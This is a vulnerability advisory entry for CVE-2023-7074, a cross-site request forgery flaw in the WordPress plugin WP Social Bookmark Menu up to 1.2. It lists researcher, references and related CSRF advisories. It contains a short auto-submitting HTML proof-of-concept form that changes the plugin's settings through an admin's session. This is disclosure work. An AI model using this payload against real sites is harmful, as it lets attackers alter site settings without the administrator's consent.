WP Social Bookmark Menu <= 1.2 – Settings Update via CSRF | CVE 2023-7074 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.

Proof of Concept

<form action="https://example.com/wp-admin/options-general.php?page=wp-social-bookmark-menu.php" method="POST">
    <input type="text" name="flag_save" value="1">
    <input type="text" name="position" value="onthebottom">
</form>
<script>
    document.forms[0].submit();
</script>

Affects Plugins

wp-social-bookmark-menu

No known fix

References

CVE

URL

https://magos-securitas.com/txt/CVE-2023-7074.txt

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://magos-securitas.com

Verified

Yes

WPVDB ID

7906c349-97b0-4d82-aef0-97a1175ae88e

Timeline

Publicly Published

2024-01-03 (about 4 months ago)

Added

2024-01-03 (about 4 months ago)

Last Updated

2024-01-03 (about 4 months ago)

Other

Published

Title

Published

2022-03-28

Title

Easy Digital Downloads < 2.11.6 - Arbitrary Payment Note Insertion via CSRF

Published

2014-12-12

Title

Simple Sticky Footer < 1.3.3 - Multiple CSRF

Published

2022-09-21

Title

Demon Image Annotation < 4.8 - Arbitrary Settings Update to Stored XSS via CSRF

Published

2023-11-09

Title

WP Reactions Lite < 1.3.9 - CSRF

Published

2023-09-29

Title

Backend Localization <= 2.1.10 - Settings Update via CSRF